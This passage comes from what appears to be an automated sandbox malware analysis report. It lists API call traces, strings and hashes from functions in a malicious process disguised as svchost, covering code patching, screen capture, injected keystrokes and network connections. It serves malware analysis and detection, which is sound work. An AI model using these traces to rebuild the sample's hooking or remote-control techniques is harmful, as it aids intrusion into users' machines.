Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,74DEF550,00000000,75BFBD50,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A078
memcpy.MSVCRT ref: 02D3A0A0
VirtualProtect.KERNEL32(00000000,?,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A135
VirtualProtect.KERNEL32(?,00000000,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A14A
VirtualProtect.KERNEL32(?,00000000,02D3938A,?,?,?,00000000,00000000,?,?,?,?,?,?,02D3938A,00000000), ref: 02D3A17A
VirtualProtect.KERNEL32(?,00000000,02D3938A,?,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A186

Part of subcall function 02D3A1B0: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02D3A193,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A1BC
Part of subcall function 02D3A1B0: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A1C6
Part of subcall function 02D3A1B0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A1CD
Part of subcall function 02D3A1B0: memset.MSVCRT ref: 02D3A1DE
Part of subcall function 02D3A1B0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A22A

GetCurrentProcess.KERNEL32(00000000,00000000,74DEF550,00000000,75BFBD50,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A197
FlushInstructionCache.KERNEL32(00000000,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A19E

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
String ID:
API String ID: 2609073853-0
Opcode ID: cb69586fc841348108fa1a634fc6582098ddab12e2afac379e66243df175e05c
Instruction ID: 0c65ced7532ae9a2a1f4d71a4477ad3d3c01dbd5681c7132086653f3d33db38b
Opcode Fuzzy Hash: cb69586fc841348108fa1a634fc6582098ddab12e2afac379e66243df175e05c
Instruction Fuzzy Hash: D4412976B40216ABCB119F78CC88FBA7B6AEF40254F14412DE98997388DA75DD01C7F0

Function 02D4D827 Relevance: 12.1, APIs: 8, Instructions: 87stringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,02D6AD0C,?,00000001,?), ref: 02D4D83C
memcpy.MSVCRT ref: 02D4D856
lstrlenW.KERNEL32(?), ref: 02D4D865
WideCharToMultiByte.KERNEL32(000004E3,00000000,?,00000001,?,00000001,00000000,00000000), ref: 02D4D883
lstrlenW.KERNEL32(?), ref: 02D4D88C
WideCharToMultiByte.KERNEL32(000004E3,00000000,?,00000000,?,00000000,00000000,00000000), ref: 02D4D8AD
FindNextFileW.KERNEL32(?,?), ref: 02D4D8ED
FindClose.KERNEL32(?), ref: 02D4D8FC

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: lstrlen$ByteCharFindMultiWide$CloseFileNextmemcpy
String ID:
API String ID: 2429061842-0
Opcode ID: 01e0f5ba658b3cba2a60a096ee4f10faff3a84cd0cf6d9cc0a8026068d58b578
Instruction ID: fd8893b7b509f7837e8fbd1c0a61b219fb111d3f307b8ddbe837e5fff4626fd2
Opcode Fuzzy Hash: 01e0f5ba658b3cba2a60a096ee4f10faff3a84cd0cf6d9cc0a8026068d58b578
Instruction Fuzzy Hash: B52188726402196BEB21DBA0DC49FEA7779AB84700F104595F609EB180EB71AA45CFA4

Function 004012E0 Relevance: 12.1, APIs: 8, Instructions: 84fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,7604DB30,?,00401E75,00000000), ref: 00401317
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00401E75,00000000), ref: 0040132C
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00401E75,00000000), ref: 0040133B
WriteFile.KERNEL32(00000000,?,00000000,00401E75,00000000,?,00401E75,00000000), ref: 0040134D
UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00401E75,00000000), ref: 0040135D
SetEndOfFile.KERNEL32(00000000), ref: 0040136A
GetHandleInformation.KERNEL32(00000000,00000000), ref: 0040138C
CloseHandle.KERNEL32(00000000), ref: 0040139D

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: File$Handle$CloseCreateInformationLockPointerUnlockWrite
String ID:
API String ID: 1080409958-0
Opcode ID: 767d19d3de4797b5c71be3d902a88e0ab7c1d0a14529f93e3769efd59d7c6aec
Instruction ID: fc3a19f52fd50960abd89716b3b21a8dc97a86bf959a0b9d512ee5003149b17c
Opcode Fuzzy Hash: 767d19d3de4797b5c71be3d902a88e0ab7c1d0a14529f93e3769efd59d7c6aec
Instruction Fuzzy Hash: 0E21BE71A00204BBF7205B65DD4DFAB7A6CEBC1B51F148126FF00B66E0D7B84E81C6A8

Function 02D2DAF0 Relevance: 12.1, APIs: 8, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(00000000,00000005), ref: 02D2DB0C
GetWindow.USER32(00000000), ref: 02D2DB0F
IsWindowVisible.USER32(00000000), ref: 02D2DB21
GetWindowLongA.USER32(00000000,000000F0), ref: 02D2DB32
GetClassNameA.USER32(00000000,?,00000101), ref: 02D2DB4C
PostMessageA.USER32(00000000,00000100,0000001B,00000000), ref: 02D2DBA6
PostMessageA.USER32(00000000,00000101,0000001B,C01B0000), ref: 02D2DBB5
GetWindow.USER32(00000000,00000003), ref: 02D2DBBA

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$MessagePost$ClassLongNameVisible
String ID:
API String ID: 4167699426-0
Opcode ID: 3decd5b175a85742f579486d143ebee1e64424f89963f3996e9e04efd5d4bfc5
Instruction ID: f7a3421179e5c7bfde4582ce180f599bfb7991e3b27fb899fcbe3d5d92c135d3
Opcode Fuzzy Hash: 3decd5b175a85742f579486d143ebee1e64424f89963f3996e9e04efd5d4bfc5
Instruction Fuzzy Hash: 51215B316802642AE7309A35ECADFEB7379EB19725F000614FA81E63C0D7A4EC94C574

Function 02D28380 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 02D28388
SelectObject.GDI32(?,00000000), ref: 02D283A8
DeleteObject.GDI32(?), ref: 02D283B1
DeleteDC.GDI32(?), ref: 02D283BD
CreateCompatibleDC.GDI32(00000000), ref: 02D283F2
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02D28411
SelectObject.GDI32(?,00000000), ref: 02D28433
ReleaseDC.USER32(00000000,00000000), ref: 02D28441

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreateDeleteSelect$BitmapRelease
String ID:
API String ID: 2733039346-0
Opcode ID: 1650c12abe84ee58564dcde1c4c2d6c6f3976bfe68c698a62d604499912723e1
Instruction ID: a308955159820564f39df739a60e4b9ffa060d88bb13cc5ccbaec523535e55ba
Opcode Fuzzy Hash: 1650c12abe84ee58564dcde1c4c2d6c6f3976bfe68c698a62d604499912723e1
Instruction Fuzzy Hash: 111129B6D856109FC700CF68F98CEA637F8EB9D6107580954F48AC3301E6789CA5CB70

Function 02D29990 Relevance: 10.7, APIs: 7, Instructions: 167synchronizationwindowkeyboardCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,?,?,02D29CF9,00000000,?,?,?,?,02D291A0,?,?), ref: 02D299F1
MapVirtualKeyW.USER32(00000000,00000000), ref: 02D29A0F
ReleaseMutex.KERNEL32(00000000,?,?,?,?,02D29CF9,00000000,?,?,?,?,02D291A0,?,?), ref: 02D29ADF
ReleaseMutex.KERNEL32(00000000,?,?,?,?,02D29CF9,00000000,?,?,?,?,02D291A0,?,?), ref: 02D29B01
SendMessageA.USER32(?,0000E2AD,00000000,00000000), ref: 02D29B48
SendMessageW.USER32(?,?,00000003,00000000), ref: 02D29B6E
PostMessageW.USER32(?,00000101,?,?), ref: 02D29B7B

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Message$MutexReleaseSend$ObjectPostSingleVirtualWait
String ID:
API String ID: 3783495248-0
Opcode ID: c1c5fad3d234af009e98d8c5ab8a631549b85c06fc2924f443b6d23c6814d1b9
Instruction ID: 62da3aa2c1669c6bd994e1f06b8c6866cd4ab4d293bce1faa79b75e23e2e3807
Opcode Fuzzy Hash: c1c5fad3d234af009e98d8c5ab8a631549b85c06fc2924f443b6d23c6814d1b9
Instruction Fuzzy Hash: FC512932A483A09ED721CF68E869BE53BD09B6632CF684589D8C2873C1C3798D5DD760

Function 02D2C8C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(02D2D04D), ref: 02D2C8DF
GetWindowInfo.USER32(02D2D04D,?), ref: 02D2C8F9
GetClassLongA.USER32(02D2D04D,000000E6), ref: 02D2C94E
PrintWindow.USER32(02D2D04D,?,00000000), ref: 02D2C967
BitBlt.GDI32(02D2CB32,?,?,?,?,75C0BCB0,00000000,00000000,00CC0020), ref: 02D2CA0E

Part of subcall function 02D2DA30: GetClassNameA.USER32(?,?,00000101), ref: 02D2DA46

Part of subcall function 02D2C700: SendMessageA.USER32(?,?,00000004,00000000), ref: 02D2C728
Part of subcall function 02D2C700: GdiFlush.GDI32(00000000,?,?,75BF3EB0,?,?,?,02D290B9), ref: 02D2C73E
Part of subcall function 02D2C700: BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 02D2C764

Strings

<, xrefs: 02D2C8F2

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
String ID: <
API String ID: 2334662925-4251816714
Opcode ID: 04be2fcf1492e94c706d9bc2c14f1e22a1e77ac8b867cb3f3c82c621f942e430
Instruction ID: 20210a7588a024af31934c3216cb833a68304447c4a2b33965665de70e4a2cee
Opcode Fuzzy Hash: 04be2fcf1492e94c706d9bc2c14f1e22a1e77ac8b867cb3f3c82c621f942e430
Instruction Fuzzy Hash: B2416B71E14529AFCB14CF58C884BAEB7B6FF98349F66421AE405B3740D730AD59CBA0

Function 02D257D0 Relevance: 10.6, APIs: 7, Instructions: 110synchronizationCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25810
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2583C
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25863
GetLastError.KERNEL32 ref: 02D25884
WaitForSingleObject.KERNEL32(00000338,000003E8), ref: 02D258B4
ReleaseMutex.KERNEL32(00000338), ref: 02D258D5
SetLastError.KERNEL32(?), ref: 02D258EE

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
String ID:
API String ID: 2971961948-0
Opcode ID: c81663f6603e00606336793fe1c5d451902e4b1204fe7fec22d85bc1b10f7112
Instruction ID: cb05b88caa9f56831eb5a3983e5a85e514916d9dfbaa165d9d7520a246d70111
Opcode Fuzzy Hash: c81663f6603e00606336793fe1c5d451902e4b1204fe7fec22d85bc1b10f7112
Instruction Fuzzy Hash: E941E675D40218EFDB44CFA8E885AADBBF5FB98314F90456AE904E7300E775AD05CBA0

Function 02D30AF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104networkCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D30B23
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D30B4F
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D30B76
HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 02D30BBC
HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02D30BCF

Strings

Accept-Encoding:, xrefs: 02D30BC9

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$HeadersHttpRequest
String ID: Accept-Encoding:
API String ID: 853579731-3444961765
Opcode ID: cc2f040a6b5efc3fd58852453dbd0b9c8a0e6f011343d0ea91af4b23fd4b1df7
Instruction ID: 805e58b2f304f38b79dc1de66e4a7d7cdb1d05d543c80a95f84d09c2899aefab
Opcode Fuzzy Hash: cc2f040a6b5efc3fd58852453dbd0b9c8a0e6f011343d0ea91af4b23fd4b1df7
Instruction Fuzzy Hash: 5A31FCB5D01209AFDB40DFA9D885AEEBBB9EF88314F50451AE914E3300E3706D41CBA0

Function 02D309E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104networkCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D30A13
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D30A3F
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D30A66
HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 02D30AAC
HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02D30ABF

Strings

Accept-Encoding:, xrefs: 02D30AB9

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$HeadersHttpRequest
String ID: Accept-Encoding:
API String ID: 853579731-3444961765
Opcode ID: 12d4609df475e6be82bfb37fecf8874e5e0a9e3211ff9f7bcd238e90d8fd8a40
Instruction ID: e03ed9dd29ef3bb1d41b81e8ae59994dfa5e22c6f31096620865b321b8448d57
Opcode Fuzzy Hash: 12d4609df475e6be82bfb37fecf8874e5e0a9e3211ff9f7bcd238e90d8fd8a40
Instruction Fuzzy Hash: DF31FBB5D41219AFDB40DFA9E885AEEBBB9EF58310F51412AE914E3300D370AD40CBA0

Function 02D25900 Relevance: 10.6, APIs: 7, Instructions: 97synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02D25918
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25949
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D25975
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2599C
WaitForSingleObject.KERNEL32(00000338,000003E8), ref: 02D259CD
ReleaseMutex.KERNEL32(00000338), ref: 02D259EE
SetLastError.KERNEL32(?), ref: 02D259F8

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
String ID:
API String ID: 2971961948-0
Opcode ID: 84cda661cf541ee3998bbab42de962eaa88767b02a1eb021b6696fd7ea964623
Instruction ID: 69f3cf0efb798fa4c831efc6ab1a9573a06768281983550c1615e44e6a55d9a6
Opcode Fuzzy Hash: 84cda661cf541ee3998bbab42de962eaa88767b02a1eb021b6696fd7ea964623
Instruction Fuzzy Hash: A231E5B5E40218AFDB40CFA8E885AADBBF5FB58310F90856AE508E7300E7755D558FA0

Function 02D2B930 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92stringCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2B96F
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2B99B
VirtualQuery.KERNEL32(Function_000250A0,?,0000001C), ref: 02D2B9C2
GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02D2B9F1
lstrcmpiA.KERNEL32(?,a1633b6ba), ref: 02D2BA07

Strings

a1633b6ba, xrefs: 02D2B9FB

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$InformationObjectUserlstrcmpi
String ID: a1633b6ba
API String ID: 410342393-2535263190
Opcode ID: 1006249fc51fbb31b561190a4c532f974995944dbd5295462e9a300830251fa8
Instruction ID: 1a3e80c05d2274b53c4749dfc49c923f0653172982eaf0c2832d50a84bffe6e8
Opcode Fuzzy Hash: 1006249fc51fbb31b561190a4c532f974995944dbd5295462e9a300830251fa8
Instruction Fuzzy Hash: CD311EB1D1021DAFDB40CFA9D885AEEBBF4FB58304F50806AE515E7200E7B55A44CFA0

Function 02D3BAC6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79threadCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3BAE7
CreateThread.KERNEL32(00000000,00000000,Function_0001C350,02D7A080,00000000,00000000), ref: 02D3BB80
GetHandleInformation.KERNEL32(00000000,?), ref: 02D3BB98
CloseHandle.KERNEL32(00000000), ref: 02D3BBA9

Strings

5E8DC08D, xrefs: 02D3BAE2, 02D3BAED
keys, xrefs: 02D3BB2B

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$BackslashCloseCreateInformationPathThread
String ID: 5E8DC08D$keys
API String ID: 3186380484-1946552345
Opcode ID: 93d5e42cb9eaeb9a58a5a570abbabf331c4d7f61f47d73ddd133981b7c650e25
Instruction ID: c7eaa158ccccdc5d4f71ffc7aa8ec1b0d7acf127fedfcdff2409b93eaf2a6fd5
Opcode Fuzzy Hash: 93d5e42cb9eaeb9a58a5a570abbabf331c4d7f61f47d73ddd133981b7c650e25
Instruction Fuzzy Hash: 022128309052495FDB228B64E8287EE7BE4EF49748F2444C6E885E7340EF719D48C7A4

Function 02D3A2B0 Relevance: 10.6, APIs: 7, Instructions: 72memorysynchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8), ref: 02D3A2CB
VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02D3A318
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02D3A347
FlushInstructionCache.KERNEL32(00000000), ref: 02D3A34E
VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02D3A362
ReleaseMutex.KERNEL32(?), ref: 02D3A379
Sleep.KERNEL32(00000064), ref: 02D3A381

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
String ID:
API String ID: 842647815-0
Opcode ID: 2a49b86af9ad83d6d89970286432b877b567e4d3e0cfeda8082f3c8ee463941f
Instruction ID: 5421805c7bf04fcc7e272e98f4ed3147acdb819049ad7dc100cee0f97b635c34
Opcode Fuzzy Hash: 2a49b86af9ad83d6d89970286432b877b567e4d3e0cfeda8082f3c8ee463941f
Instruction Fuzzy Hash: 1C210A75A40701EFD718CF54E988E5AB7A5FF48700F118908EA8A5B790CB74FD54CBA0

Function 02D50E50 Relevance: 10.6, APIs: 7, Instructions: 67networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 02D50E74
inet_addr.WS2_32(?), ref: 02D50E7F
htonl.WS2_32(000000FF), ref: 02D50E8A
gethostbyname.WS2_32(?), ref: 02D50E96
socket.WS2_32(00000002,00000001,00000000), ref: 02D50EB0
connect.WS2_32(00000000,?,00000010), ref: 02D50EC3
closesocket.WS2_32(00000000), ref: 02D50ECE

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: closesocketconnectgethostbynamehtonlhtonsinet_addrsocket
String ID:
API String ID: 298246419-0
Opcode ID: 3217eb05137bcef32e880bedbf85a4b0162b16ffd6dea7ae1b87405ee62a9aae
Instruction ID: 5d288c134242fa0ed65adea444d95526e5d2a171af2970e8c549daf49df6ec90
Opcode Fuzzy Hash: 3217eb05137bcef32e880bedbf85a4b0162b16ffd6dea7ae1b87405ee62a9aae
Instruction Fuzzy Hash: BB11B431A50218AFDB00DFA8EC4DB9EB7A9FF49311F804669FD11A7390D7709C508BA0

Function 02D2D6C0 Relevance: 10.6, APIs: 7, Instructions: 53synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,02D2D690,00000000,00000000,00000000), ref: 02D2D6D4
GetHandleInformation.KERNEL32(00000000,00000000,?,?,02D29B2A,?,?,?,?,02D29CF9,00000000,?,?,?,?,02D291A0), ref: 02D2D6EC
CloseHandle.KERNEL32(00000000,?,?,02D29B2A,?,?,?,?,02D29CF9,00000000,?,?,?,?,02D291A0,?), ref: 02D2D6FD
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02D29B2A,?,?,?,?,02D29CF9,00000000,?,?,?,?,02D291A0), ref: 02D2D70C
ReleaseMutex.KERNEL32(00000000), ref: 02D2D740
IsWindow.USER32(?), ref: 02D2D747
PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02D2D75B

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
String ID:
API String ID: 731183410-0
Opcode ID: 6f8cce3e2e680c5b598e3d60b1e63d9173a6d421386b47cdb7927a320163b4b9
Instruction ID: 213c556329abb0a04926eb92a8b3c44f1d66f2c2a6c8423b499c891d20707eb1
Opcode Fuzzy Hash: 6f8cce3e2e680c5b598e3d60b1e63d9173a6d421386b47cdb7927a320163b4b9
Instruction Fuzzy Hash: 88118230A84324ABE3109F50EC0DF9A37A8AF15719F644690F906AB3C0D7B45D54CBA4

Function 00403310 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 00403337
GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403359
OpenProcessToken.ADVAPI32(00000000), ref: 00403360
GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403381
CloseHandle.KERNEL32(00000000), ref: 00403397

Strings

\\?\globalroot\systemroot\system32\tasks\, xrefs: 00403319

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
String ID: \\?\globalroot\systemroot\system32\tasks\
API String ID: 4133869067-1576788796
Opcode ID: 76f7c13d41ba4f40b5ff24f9cac2bfcc18b58a5216b2a1f5173a808488ca33cd
Instruction ID: 49b559ea0f9bb78937d1c0884117093763843d0ff56e3b8f35a0dc65749093db
Opcode Fuzzy Hash: 76f7c13d41ba4f40b5ff24f9cac2bfcc18b58a5216b2a1f5173a808488ca33cd
Instruction Fuzzy Hash: E60165B5A00208EBEB20DFA4DD4DB9F7B7CAB44715F0080A6EA05B2280DA749B44DF64

Function 02D2C2A0 Relevance: 10.5, APIs: 7, Instructions: 47windowsleepthreadCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 02D2C2A8
GetWindowThreadProcessId.USER32(?,?), ref: 02D2C2B7
Sleep.KERNEL32(00000000), ref: 02D2C30F

